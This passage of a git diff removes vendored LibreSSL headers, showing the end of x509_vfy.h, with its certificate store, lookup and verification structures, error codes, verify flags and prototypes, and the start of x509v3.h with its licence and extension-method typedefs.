- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_X509_H
-#include <openssl/x509.h>
-/* openssl/x509.h ends up #include-ing this file at about the only
- * appropriate moment. */
-#endif
-
-#ifndef HEADER_X509_VFY_H
-#define HEADER_X509_VFY_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_LHASH
-#include <openssl/lhash.h>
-#endif
-#include <openssl/bio.h>
-#include <openssl/crypto.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct x509_file_st
-	{
-	int num_paths;	/* number of paths to files or directories */
-	int num_alloced;
-	char **paths;	/* the list of paths or directories */
-	int *path_type;
-	} X509_CERT_FILE_CTX;
-
-/*******************************/
-/*
-SSL_CTX -> X509_STORE    
-		-> X509_LOOKUP
-			->X509_LOOKUP_METHOD
-		-> X509_LOOKUP
-			->X509_LOOKUP_METHOD
- 
-SSL	-> X509_STORE_CTX
-		->X509_STORE    
-
-The X509_STORE holds the tables etc for verification stuff.
-A X509_STORE_CTX is used while validating a single certificate.
-The X509_STORE has X509_LOOKUPs for looking up certs.
-The X509_STORE then calls a function to actually verify the
-certificate chain.
-*/
-
-#define X509_LU_RETRY		-1
-#define X509_LU_FAIL		0
-#define X509_LU_X509		1
-#define X509_LU_CRL		2
-#define X509_LU_PKEY		3
-
-typedef struct x509_object_st
-	{
-	/* one of the above types */
-	int type;
-	union	{
-		char *ptr;
-		X509 *x509;
-		X509_CRL *crl;
-		EVP_PKEY *pkey;
-		} data;
-	} X509_OBJECT;
-
-typedef struct x509_lookup_st X509_LOOKUP;
-
-DECLARE_STACK_OF(X509_LOOKUP)
-DECLARE_STACK_OF(X509_OBJECT)
-
-/* This is a static that defines the function interface */
-typedef struct x509_lookup_method_st
-	{
-	const char *name;
-	int (*new_item)(X509_LOOKUP *ctx);
-	void (*free)(X509_LOOKUP *ctx);
-	int (*init)(X509_LOOKUP *ctx);
-	int (*shutdown)(X509_LOOKUP *ctx);
-	int (*ctrl)(X509_LOOKUP *ctx,int cmd,const char *argc,long argl,
-			char **ret);
-	int (*get_by_subject)(X509_LOOKUP *ctx,int type,X509_NAME *name,
-			      X509_OBJECT *ret);
-	int (*get_by_issuer_serial)(X509_LOOKUP *ctx,int type,X509_NAME *name,
-				    ASN1_INTEGER *serial,X509_OBJECT *ret);
-	int (*get_by_fingerprint)(X509_LOOKUP *ctx,int type,
-				  unsigned char *bytes,int len,
-				  X509_OBJECT *ret);
-	int (*get_by_alias)(X509_LOOKUP *ctx,int type,char *str,int len,
-			    X509_OBJECT *ret);
-	} X509_LOOKUP_METHOD;
-
-typedef struct X509_VERIFY_PARAM_ID_st X509_VERIFY_PARAM_ID;
-
-/* This structure hold all parameters associated with a verify operation
- * by including an X509_VERIFY_PARAM structure in related structures the
- * parameters used can be customized
- */
-
-typedef struct X509_VERIFY_PARAM_st
-	{
-	char *name;
-	time_t check_time;	/* Time to use */
-	unsigned long inh_flags; /* Inheritance flags */
-	unsigned long flags;	/* Various verify flags */
-	int purpose;		/* purpose to check untrusted certificates */
-	int trust;		/* trust setting to check */
-	int depth;		/* Verify depth */
-	STACK_OF(ASN1_OBJECT) *policies;	/* Permissible policies */
-	X509_VERIFY_PARAM_ID *id;	/* opaque ID data */
-} X509_VERIFY_PARAM;
-
-DECLARE_STACK_OF(X509_VERIFY_PARAM)
-
-/* This is used to hold everything.  It is used for all certificate
- * validation.  Once we have a certificate chain, the 'verify'
- * function is then called to actually check the cert chain. */
-struct x509_store_st
-	{
-	/* The following is a cache of trusted certs */
-	int cache; 	/* if true, stash any hits */
-	STACK_OF(X509_OBJECT) *objs;	/* Cache of all objects */
-
-	/* These are external lookup methods */
-	STACK_OF(X509_LOOKUP) *get_cert_methods;
-
-	X509_VERIFY_PARAM *param;
-
-	/* Callbacks for various operations */
-	int (*verify)(X509_STORE_CTX *ctx);	/* called to verify a certificate */
-	int (*verify_cb)(int ok,X509_STORE_CTX *ctx);	/* error callback */
-	int (*get_issuer)(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);	/* get issuers cert from ctx */
-	int (*check_issued)(X509_STORE_CTX *ctx, X509 *x, X509 *issuer); /* check issued */
-	int (*check_revocation)(X509_STORE_CTX *ctx); /* Check revocation status of chain */
-	int (*get_crl)(X509_STORE_CTX *ctx, X509_CRL **crl, X509 *x); /* retrieve CRL */
-	int (*check_crl)(X509_STORE_CTX *ctx, X509_CRL *crl); /* Check CRL validity */
-	int (*cert_crl)(X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x); /* Check certificate against CRL */
-	STACK_OF(X509) * (*lookup_certs)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	STACK_OF(X509_CRL) * (*lookup_crls)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	int (*cleanup)(X509_STORE_CTX *ctx);
-
-	CRYPTO_EX_DATA ex_data;
-	int references;
-	} /* X509_STORE */;
-
-int X509_STORE_set_depth(X509_STORE *store, int depth);
-
-#define X509_STORE_set_verify_cb_func(ctx,func) ((ctx)->verify_cb=(func))
-#define X509_STORE_set_verify_func(ctx,func)	((ctx)->verify=(func))
-
-/* This is the functions plus an instance of the local variables. */
-struct x509_lookup_st
-	{
-	int init;			/* have we been started */
-	int skip;			/* don't use us. */
-	X509_LOOKUP_METHOD *method;	/* the functions */
-	char *method_data;		/* method data */
-
-	X509_STORE *store_ctx;	/* who owns us */
-	} /* X509_LOOKUP */;
-
-/* This is a used when verifying cert chains.  Since the
- * gathering of the cert chain can take some time (and have to be
- * 'retried', this needs to be kept and passed around. */
-struct x509_store_ctx_st      /* X509_STORE_CTX */
-	{
-	X509_STORE *ctx;
-	int current_method;	/* used when looking up certs */
-
-	/* The following are set by the caller */
-	X509 *cert;		/* The cert to check */
-	STACK_OF(X509) *untrusted;	/* chain of X509s - untrusted - passed in */
-	STACK_OF(X509_CRL) *crls;	/* set of CRLs passed in */
-
-	X509_VERIFY_PARAM *param;
-	void *other_ctx;	/* Other info for use with get_issuer() */
-
-	/* Callbacks for various operations */
-	int (*verify)(X509_STORE_CTX *ctx);	/* called to verify a certificate */
-	int (*verify_cb)(int ok,X509_STORE_CTX *ctx);		/* error callback */
-	int (*get_issuer)(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);	/* get issuers cert from ctx */
-	int (*check_issued)(X509_STORE_CTX *ctx, X509 *x, X509 *issuer); /* check issued */
-	int (*check_revocation)(X509_STORE_CTX *ctx); /* Check revocation status of chain */
-	int (*get_crl)(X509_STORE_CTX *ctx, X509_CRL **crl, X509 *x); /* retrieve CRL */
-	int (*check_crl)(X509_STORE_CTX *ctx, X509_CRL *crl); /* Check CRL validity */
-	int (*cert_crl)(X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x); /* Check certificate against CRL */
-	int (*check_policy)(X509_STORE_CTX *ctx);
-	STACK_OF(X509) * (*lookup_certs)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	STACK_OF(X509_CRL) * (*lookup_crls)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	int (*cleanup)(X509_STORE_CTX *ctx);
-
-	/* The following is built up */
-	int valid;		/* if 0, rebuild chain */
-	int last_untrusted;	/* index of last untrusted cert */
-	STACK_OF(X509) *chain; 		/* chain of X509s - built up and trusted */
-	X509_POLICY_TREE *tree;	/* Valid policy tree */
-
-	int explicit_policy;	/* Require explicit policy value */
-
-	/* When something goes wrong, this is why */
-	int error_depth;
-	int error;
-	X509 *current_cert;
-	X509 *current_issuer;	/* cert currently being tested as valid issuer */
-	X509_CRL *current_crl;	/* current CRL */
-
-	int current_crl_score;  /* score of current CRL */
-	unsigned int current_reasons;  /* Reason mask */
-
-	X509_STORE_CTX *parent; /* For CRL path validation: parent context */
-
-	CRYPTO_EX_DATA ex_data;
-	} /* X509_STORE_CTX */;
-
-void X509_STORE_CTX_set_depth(X509_STORE_CTX *ctx, int depth);
-
-#define X509_STORE_CTX_set_app_data(ctx,data) \
-	X509_STORE_CTX_set_ex_data(ctx,0,data)
-#define X509_STORE_CTX_get_app_data(ctx) \
-	X509_STORE_CTX_get_ex_data(ctx,0)
-
-#define X509_L_FILE_LOAD	1
-#define X509_L_ADD_DIR		2
-#define X509_L_MEM		3
-
-#define X509_LOOKUP_load_file(x,name,type) \
-		X509_LOOKUP_ctrl((x),X509_L_FILE_LOAD,(name),(long)(type),NULL)
-
-#define X509_LOOKUP_add_dir(x,name,type) \
-		X509_LOOKUP_ctrl((x),X509_L_ADD_DIR,(name),(long)(type),NULL)
-
-#define X509_LOOKUP_add_mem(x,iov,type) \
-		X509_LOOKUP_ctrl((x),X509_L_MEM,(const char *)(iov),\
-		(long)(type),NULL)
-
-#define		X509_V_OK					0
-#define		X509_V_ERR_UNSPECIFIED				1
-#define		X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT		2
-#define		X509_V_ERR_UNABLE_TO_GET_CRL			3
-#define		X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE	4
-#define		X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE	5
-#define		X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY	6
-#define		X509_V_ERR_CERT_SIGNATURE_FAILURE		7
-#define		X509_V_ERR_CRL_SIGNATURE_FAILURE		8
-#define		X509_V_ERR_CERT_NOT_YET_VALID			9
-#define		X509_V_ERR_CERT_HAS_EXPIRED			10
-#define		X509_V_ERR_CRL_NOT_YET_VALID			11
-#define		X509_V_ERR_CRL_HAS_EXPIRED			12
-#define		X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD	13
-#define		X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD	14
-#define		X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD	15
-#define		X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD	16
-#define		X509_V_ERR_OUT_OF_MEM				17
-#define		X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT		18
-#define		X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN		19
-#define		X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY	20
-#define		X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE	21
-#define		X509_V_ERR_CERT_CHAIN_TOO_LONG			22
-#define		X509_V_ERR_CERT_REVOKED				23
-#define		X509_V_ERR_INVALID_CA				24
-#define		X509_V_ERR_PATH_LENGTH_EXCEEDED			25
-#define		X509_V_ERR_INVALID_PURPOSE			26
-#define		X509_V_ERR_CERT_UNTRUSTED			27
-#define		X509_V_ERR_CERT_REJECTED			28
-/* These are 'informational' when looking for issuer cert */
-#define		X509_V_ERR_SUBJECT_ISSUER_MISMATCH		29
-#define		X509_V_ERR_AKID_SKID_MISMATCH			30
-#define		X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH		31
-#define		X509_V_ERR_KEYUSAGE_NO_CERTSIGN			32
-
-#define		X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER		33
-#define		X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION		34
-#define		X509_V_ERR_KEYUSAGE_NO_CRL_SIGN			35
-#define		X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION	36
-#define		X509_V_ERR_INVALID_NON_CA			37
-#define		X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED		38
-#define		X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE	39
-#define		X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED	40
-
-#define		X509_V_ERR_INVALID_EXTENSION			41
-#define		X509_V_ERR_INVALID_POLICY_EXTENSION		42
-#define		X509_V_ERR_NO_EXPLICIT_POLICY			43
-#define		X509_V_ERR_DIFFERENT_CRL_SCOPE			44
-#define		X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE	45
-
-#define		X509_V_ERR_UNNESTED_RESOURCE			46
-
-#define		X509_V_ERR_PERMITTED_VIOLATION			47
-#define		X509_V_ERR_EXCLUDED_VIOLATION			48
-#define		X509_V_ERR_SUBTREE_MINMAX			49
-#define		X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE		51
-#define		X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX	52
-#define		X509_V_ERR_UNSUPPORTED_NAME_SYNTAX		53
-#define		X509_V_ERR_CRL_PATH_VALIDATION_ERROR		54
-
-/* The application is not happy */
-#define		X509_V_ERR_APPLICATION_VERIFICATION		50
-
-/* Host, email and IP check errors */
-#define		X509_V_ERR_HOSTNAME_MISMATCH			62
-#define		X509_V_ERR_EMAIL_MISMATCH			63
-#define		X509_V_ERR_IP_ADDRESS_MISMATCH			64
-
-/* Caller error */
-#define		X509_V_ERR_INVALID_CALL				65
-/* Issuer lookup error */
-#define		X509_V_ERR_STORE_LOOKUP				66
-
-/* Certificate verify flags */
-
-/* Send issuer+subject checks to verify_cb */
-#define	X509_V_FLAG_CB_ISSUER_CHECK		0x1
-/* Use check time instead of current time */
-#define	X509_V_FLAG_USE_CHECK_TIME		0x2
-/* Lookup CRLs */
-#define	X509_V_FLAG_CRL_CHECK			0x4
-/* Lookup CRLs for whole chain */
-#define	X509_V_FLAG_CRL_CHECK_ALL		0x8
-/* Ignore unhandled critical extensions */
-#define	X509_V_FLAG_IGNORE_CRITICAL		0x10
-/* Disable workarounds for broken certificates */
-#define	X509_V_FLAG_X509_STRICT			0x20
-/* Enable proxy certificate validation */
-#define	X509_V_FLAG_ALLOW_PROXY_CERTS		0x40
-/* Enable policy checking */
-#define X509_V_FLAG_POLICY_CHECK		0x80
-/* Policy variable require-explicit-policy */
-#define X509_V_FLAG_EXPLICIT_POLICY		0x100
-/* Policy variable inhibit-any-policy */
-#define	X509_V_FLAG_INHIBIT_ANY			0x200
-/* Policy variable inhibit-policy-mapping */
-#define X509_V_FLAG_INHIBIT_MAP			0x400
-/* Notify callback that policy is OK */
-#define X509_V_FLAG_NOTIFY_POLICY		0x800
-/* Extended CRL features such as indirect CRLs, alternate CRL signing keys */
-#define X509_V_FLAG_EXTENDED_CRL_SUPPORT	0x1000
-/* Delta CRL support */
-#define X509_V_FLAG_USE_DELTAS			0x2000
-/* Check selfsigned CA signature */
-#define X509_V_FLAG_CHECK_SS_SIGNATURE		0x4000
-/* Use trusted store first */
-#define X509_V_FLAG_TRUSTED_FIRST		0x8000
-/* Allow partial chains if at least one certificate is in trusted store */
-#define X509_V_FLAG_PARTIAL_CHAIN		0x80000
-
-/* If the initial chain is not trusted, do not attempt to build an alternative
- * chain. Alternate chain checking was introduced in 1.0.2b. Setting this flag
- * will force the behaviour to match that of previous versions. */
-#define X509_V_FLAG_NO_ALT_CHAINS		0x100000
-
-/* Do not check certificate or CRL validity against current time. */
-#define X509_V_FLAG_NO_CHECK_TIME		0x200000
-
-#define X509_VP_FLAG_DEFAULT			0x1
-#define X509_VP_FLAG_OVERWRITE			0x2
-#define X509_VP_FLAG_RESET_FLAGS		0x4
-#define X509_VP_FLAG_LOCKED			0x8
-#define X509_VP_FLAG_ONCE			0x10
-
-/* Internal use: mask of policy related options */
-#define X509_V_FLAG_POLICY_MASK (X509_V_FLAG_POLICY_CHECK \
-				| X509_V_FLAG_EXPLICIT_POLICY \
-				| X509_V_FLAG_INHIBIT_ANY \
-				| X509_V_FLAG_INHIBIT_MAP)
-
-int X509_OBJECT_idx_by_subject(STACK_OF(X509_OBJECT) *h, int type,
-	     X509_NAME *name);
-X509_OBJECT *X509_OBJECT_retrieve_by_subject(STACK_OF(X509_OBJECT) *h,int type,X509_NAME *name);
-X509_OBJECT *X509_OBJECT_retrieve_match(STACK_OF(X509_OBJECT) *h, X509_OBJECT *x);
-void X509_OBJECT_up_ref_count(X509_OBJECT *a);
-void X509_OBJECT_free_contents(X509_OBJECT *a);
-X509_STORE *X509_STORE_new(void );
-void X509_STORE_free(X509_STORE *v);
-
-STACK_OF(X509)* X509_STORE_get1_certs(X509_STORE_CTX *st, X509_NAME *nm);
-STACK_OF(X509_CRL)* X509_STORE_get1_crls(X509_STORE_CTX *st, X509_NAME *nm);
-int X509_STORE_set_flags(X509_STORE *ctx, unsigned long flags);
-int X509_STORE_set_purpose(X509_STORE *ctx, int purpose);
-int X509_STORE_set_trust(X509_STORE *ctx, int trust);
-int X509_STORE_set1_param(X509_STORE *ctx, X509_VERIFY_PARAM *pm);
-
-void X509_STORE_set_verify_cb(X509_STORE *ctx,
-				  int (*verify_cb)(int, X509_STORE_CTX *));
-
-X509_STORE_CTX *X509_STORE_CTX_new(void);
-
-int X509_STORE_CTX_get1_issuer(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);
-
-void X509_STORE_CTX_free(X509_STORE_CTX *ctx);
-int X509_STORE_CTX_init(X509_STORE_CTX *ctx, X509_STORE *store,
-			 X509 *x509, STACK_OF(X509) *chain);
-void X509_STORE_CTX_trusted_stack(X509_STORE_CTX *ctx, STACK_OF(X509) *sk);
-void X509_STORE_CTX_cleanup(X509_STORE_CTX *ctx);
-
-X509_LOOKUP *X509_STORE_add_lookup(X509_STORE *v, X509_LOOKUP_METHOD *m);
-
-X509_LOOKUP_METHOD *X509_LOOKUP_hash_dir(void);
-X509_LOOKUP_METHOD *X509_LOOKUP_file(void);
-X509_LOOKUP_METHOD *X509_LOOKUP_mem(void);
-
-int X509_STORE_add_cert(X509_STORE *ctx, X509 *x);
-int X509_STORE_add_crl(X509_STORE *ctx, X509_CRL *x);
-
-int X509_STORE_get_by_subject(X509_STORE_CTX *vs,int type,X509_NAME *name,
-	X509_OBJECT *ret);
-
-int X509_LOOKUP_ctrl(X509_LOOKUP *ctx, int cmd, const char *argc,
-	long argl, char **ret);
-
-int X509_load_cert_file(X509_LOOKUP *ctx, const char *file, int type);
-int X509_load_crl_file(X509_LOOKUP *ctx, const char *file, int type);
-int X509_load_cert_crl_file(X509_LOOKUP *ctx, const char *file, int type);
-
-
-X509_LOOKUP *X509_LOOKUP_new(X509_LOOKUP_METHOD *method);
-void X509_LOOKUP_free(X509_LOOKUP *ctx);
-int X509_LOOKUP_init(X509_LOOKUP *ctx);
-int X509_LOOKUP_by_subject(X509_LOOKUP *ctx, int type, X509_NAME *name,
-	X509_OBJECT *ret);
-int X509_LOOKUP_by_issuer_serial(X509_LOOKUP *ctx, int type, X509_NAME *name,
-	ASN1_INTEGER *serial, X509_OBJECT *ret);
-int X509_LOOKUP_by_fingerprint(X509_LOOKUP *ctx, int type,
-	unsigned char *bytes, int len, X509_OBJECT *ret);
-int X509_LOOKUP_by_alias(X509_LOOKUP *ctx, int type, char *str,
-	int len, X509_OBJECT *ret);
-int X509_LOOKUP_shutdown(X509_LOOKUP *ctx);
-
-int	X509_STORE_load_locations (X509_STORE *ctx,
-		const char *file, const char *dir);
-int	X509_STORE_load_mem(X509_STORE *ctx, void *buf, int len);
-int	X509_STORE_set_default_paths(X509_STORE *ctx);
-
-int X509_STORE_CTX_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int	X509_STORE_CTX_set_ex_data(X509_STORE_CTX *ctx,int idx,void *data);
-void *	X509_STORE_CTX_get_ex_data(X509_STORE_CTX *ctx,int idx);
-int	X509_STORE_CTX_get_error(X509_STORE_CTX *ctx);
-void	X509_STORE_CTX_set_error(X509_STORE_CTX *ctx,int s);
-int	X509_STORE_CTX_get_error_depth(X509_STORE_CTX *ctx);
-X509 *	X509_STORE_CTX_get_current_cert(X509_STORE_CTX *ctx);
-X509 *X509_STORE_CTX_get0_current_issuer(X509_STORE_CTX *ctx);
-X509_CRL *X509_STORE_CTX_get0_current_crl(X509_STORE_CTX *ctx);
-X509_STORE_CTX *X509_STORE_CTX_get0_parent_ctx(X509_STORE_CTX *ctx);
-STACK_OF(X509) *X509_STORE_CTX_get_chain(X509_STORE_CTX *ctx);
-STACK_OF(X509) *X509_STORE_CTX_get1_chain(X509_STORE_CTX *ctx);
-void	X509_STORE_CTX_set_cert(X509_STORE_CTX *c,X509 *x);
-void	X509_STORE_CTX_set_chain(X509_STORE_CTX *c,STACK_OF(X509) *sk);
-void	X509_STORE_CTX_set0_crls(X509_STORE_CTX *c,STACK_OF(X509_CRL) *sk);
-int X509_STORE_CTX_set_purpose(X509_STORE_CTX *ctx, int purpose);
-int X509_STORE_CTX_set_trust(X509_STORE_CTX *ctx, int trust);
-int X509_STORE_CTX_purpose_inherit(X509_STORE_CTX *ctx, int def_purpose,
-				int purpose, int trust);
-void X509_STORE_CTX_set_flags(X509_STORE_CTX *ctx, unsigned long flags);
-void X509_STORE_CTX_set_time(X509_STORE_CTX *ctx, unsigned long flags,
-								time_t t);
-void X509_STORE_CTX_set_verify_cb(X509_STORE_CTX *ctx,
-				  int (*verify_cb)(int, X509_STORE_CTX *));
-  
-X509_POLICY_TREE *X509_STORE_CTX_get0_policy_tree(X509_STORE_CTX *ctx);
-int X509_STORE_CTX_get_explicit_policy(X509_STORE_CTX *ctx);
-
-X509_VERIFY_PARAM *X509_STORE_CTX_get0_param(X509_STORE_CTX *ctx);
-void X509_STORE_CTX_set0_param(X509_STORE_CTX *ctx, X509_VERIFY_PARAM *param);
-int X509_STORE_CTX_set_default(X509_STORE_CTX *ctx, const char *name);
-
-/* X509_VERIFY_PARAM functions */
-
-X509_VERIFY_PARAM *X509_VERIFY_PARAM_new(void);
-void X509_VERIFY_PARAM_free(X509_VERIFY_PARAM *param);
-int X509_VERIFY_PARAM_inherit(X509_VERIFY_PARAM *to,
-						const X509_VERIFY_PARAM *from);
-int X509_VERIFY_PARAM_set1(X509_VERIFY_PARAM *to, 
-						const X509_VERIFY_PARAM *from);
-int X509_VERIFY_PARAM_set1_name(X509_VERIFY_PARAM *param, const char *name);
-int X509_VERIFY_PARAM_set_flags(X509_VERIFY_PARAM *param, unsigned long flags);
-int X509_VERIFY_PARAM_clear_flags(X509_VERIFY_PARAM *param,
-							unsigned long flags);
-unsigned long X509_VERIFY_PARAM_get_flags(X509_VERIFY_PARAM *param);
-int X509_VERIFY_PARAM_set_purpose(X509_VERIFY_PARAM *param, int purpose);
-int X509_VERIFY_PARAM_set_trust(X509_VERIFY_PARAM *param, int trust);
-void X509_VERIFY_PARAM_set_depth(X509_VERIFY_PARAM *param, int depth);
-void X509_VERIFY_PARAM_set_time(X509_VERIFY_PARAM *param, time_t t);
-int X509_VERIFY_PARAM_add0_policy(X509_VERIFY_PARAM *param,
-						ASN1_OBJECT *policy);
-int X509_VERIFY_PARAM_set1_policies(X509_VERIFY_PARAM *param, 
-					STACK_OF(ASN1_OBJECT) *policies);
-int X509_VERIFY_PARAM_get_depth(const X509_VERIFY_PARAM *param);
-
-int X509_VERIFY_PARAM_add0_table(X509_VERIFY_PARAM *param);
-const X509_VERIFY_PARAM *X509_VERIFY_PARAM_lookup(const char *name);
-void X509_VERIFY_PARAM_table_cleanup(void);
-
-int X509_policy_check(X509_POLICY_TREE **ptree, int *pexplicit_policy,
-			STACK_OF(X509) *certs,
-			STACK_OF(ASN1_OBJECT) *policy_oids,
-			unsigned int flags);
-
-void X509_policy_tree_free(X509_POLICY_TREE *tree);
-
-int X509_policy_tree_level_count(const X509_POLICY_TREE *tree);
-X509_POLICY_LEVEL *
-	X509_policy_tree_get0_level(const X509_POLICY_TREE *tree, int i);
-
-STACK_OF(X509_POLICY_NODE) *
-	X509_policy_tree_get0_policies(const X509_POLICY_TREE *tree);
-
-STACK_OF(X509_POLICY_NODE) *
-	X509_policy_tree_get0_user_policies(const X509_POLICY_TREE *tree);
-
-int X509_policy_level_node_count(X509_POLICY_LEVEL *level);
-
-X509_POLICY_NODE *X509_policy_level_get0_node(X509_POLICY_LEVEL *level, int i);
-
-const ASN1_OBJECT *X509_policy_node_get0_policy(const X509_POLICY_NODE *node);
-
-STACK_OF(POLICYQUALINFO) *
-	X509_policy_node_get0_qualifiers(const X509_POLICY_NODE *node);
-const X509_POLICY_NODE *
-	X509_policy_node_get0_parent(const X509_POLICY_NODE *node);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
-
diff --git a/thirdparty/libressl/include/openssl/x509v3.h b/thirdparty/libressl/include/openssl/x509v3.h
deleted file mode 100644
index fbafd69..0000000
--- a/thirdparty/libressl/include/openssl/x509v3.h
+++ /dev/null
@@ -1,977 +0,0 @@
-/* $OpenBSD: x509v3.h,v 1.22 2017/06/22 17:28:00 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project 1999.
- */
-/* ====================================================================
- * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_X509V3_H
-#define HEADER_X509V3_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/bio.h>
-#include <openssl/x509.h>
-#include <openssl/conf.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Forward reference */
-struct v3_ext_method;
-struct v3_ext_ctx;
-
-/* Useful typedefs */
-
-typedef void * (*X509V3_EXT_NEW)(void);
-typedef void (*X509V3_EXT_FREE)(void *);
-typedef void * (*X509V3_EXT_D2I)(void *, const unsigned char ** , long);
-typedef int (*X509V3_EXT_I2D)(void *, unsigned char **);
-typedef STACK_OF(CONF_VALUE) *
-  (*X509V3_EXT_I2V)(const struct v3_ext_method *method, void *ext,
-		    STACK_OF(CONF_VALUE) *extlist);
-typedef void * (*X509V3_EXT_V2I)(const struct v3_ext_method *method,
-				 struct v3_ext_ctx *ctx,
-				 STACK_OF(CONF_VALUE) *values);
-typedef char * (*X509V3_EXT_I2S)(const struct v3_ext_method *method, void *ext);
-typedef void * (*X509V3_EXT_S2I)(const struct v3_ext_method *method,
-				 struct v3_ext_ctx *ctx, const char *str);
-typedef int (*X509V3_EXT_I2R)(const struct v3_ext_method *method, void *ext,
-			      BIO *out, int indent);
-typedef void * (*X509V3_EXT_R2I)(const struct v3_ext_method *method,
-				 struct v3_ext_ctx *ctx, const char *str);
-
-/* V3 extension structure */
-
-struct v3_ext_method {
-int ext_nid;
-int ext_flags;
-/* If this is set the following four fields are ignored */
-ASN1_ITEM_EXP *it;
-/* Old style ASN1 calls */
-X509V3_EXT_NEW ext_new;
-X509V3_EXT_FREE ext_free;
-X509V3_EXT_D2I d2i;
-X509V3_EXT_I2D i2d;
-
-/* The following pair is used for string extensions */
-X509V3_EXT_I2S i2s;
-X509V3_EXT_S2I s2i;
-
-/* The following pair is used for multi-valued extensions */
-X509V3_EXT_I2V i2v;
-X509V3_EXT_V2I v2i;
-
-/* The following are used for raw extensions */
-X509V3_EXT_I2R i2r;
-X509V3_EXT_R2I r2i;
-
-void *usr_data;	/* Any extension specific data */
-};
-
-typedef struct X509V3_CONF_METHOD_st {
-char * (*get_string)(void *db, char *section, char *value);
-STACK_OF(CONF_VALUE) * (*get_section)(void *db, char *section);
-void (*free_string)(void *db, char * string);
